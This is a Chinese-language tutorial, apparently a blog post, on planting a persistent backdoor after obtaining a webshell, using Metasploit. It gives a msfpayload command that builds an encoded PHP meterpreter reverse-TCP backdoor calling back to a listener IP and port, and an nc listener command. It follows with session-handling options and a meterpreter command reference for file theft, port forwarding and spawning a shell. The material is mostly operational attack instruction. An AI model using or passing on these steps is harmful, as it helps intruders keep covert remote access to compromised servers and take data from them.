1、前期--
情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用
启动PostgreSQL服务:service postgresql start 启动metasploit服务:service metasploit start 启动msfconsole:msfconsole 查看数据库连接状态:db_status
生成后门文件
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php
exp.php需要加上<?php ?>
攻击端启动监听
或者
nc 192.168.133.128 -lvp 5555
然后去访问我们的后门文件
2、大家想保存我们得到的session怎么办?首先必须连接数据库
exploit -h
-e <opt> The payload encoder to use. If none is specified, ENCODER is used. 有效负载编码,默认使用
-f Force the exploit to run regardless of the value of MinimumRank.
-h Help banner.
-j Run in the context of a job. 在后台中运行
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation 建立会话放到后台
sessions -h
-K Terminate all sessions 杀死所有sessions
-c <opt> Run a command on the session given with -i, or all 执行一个命令
-d <opt> Detach an interactive session
-h Help banner
-i <opt> Interact with the supplied session ID 连接会话
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List verbose fields
3、meterpreter使用
Core Commands 代码命令
=============
Command Description
------- -----------
? Help menu 查看帮助
background Backgrounds the current session 将sessions保存到后台
bgkill Kills a background meterpreter script 杀死后台meterpreter脚本
bglist Lists running background scripts 列出后台meterpreter脚本
bgrun Executes a meterpreter script as a background thread 在后台进程中执行一个脚本
channel Displays information about active channels 显示活动的通道
close Closes a channel 关闭通道
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session 退出
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode 开启ruby终端
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for ‘load‘
write Writes data to a channel
Stdapi: File system Commands 文件命令
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands 网络命令
===========================
Command Description
------- -----------
portfwd Forward a local port to a remote service 端口转发 portfwd add -l 5555 -p 3389 -r 192.168.198.129 将192.168.198.129的3389端口转发到本地的5555端口
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command 执行命令
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
shell Drop into a system command shell 生成一个shell
sysinfo Gets information about the remote system, such as OS 查看系统信息
附上:初探meterpreter
时间: 2024-10-06 00:35:21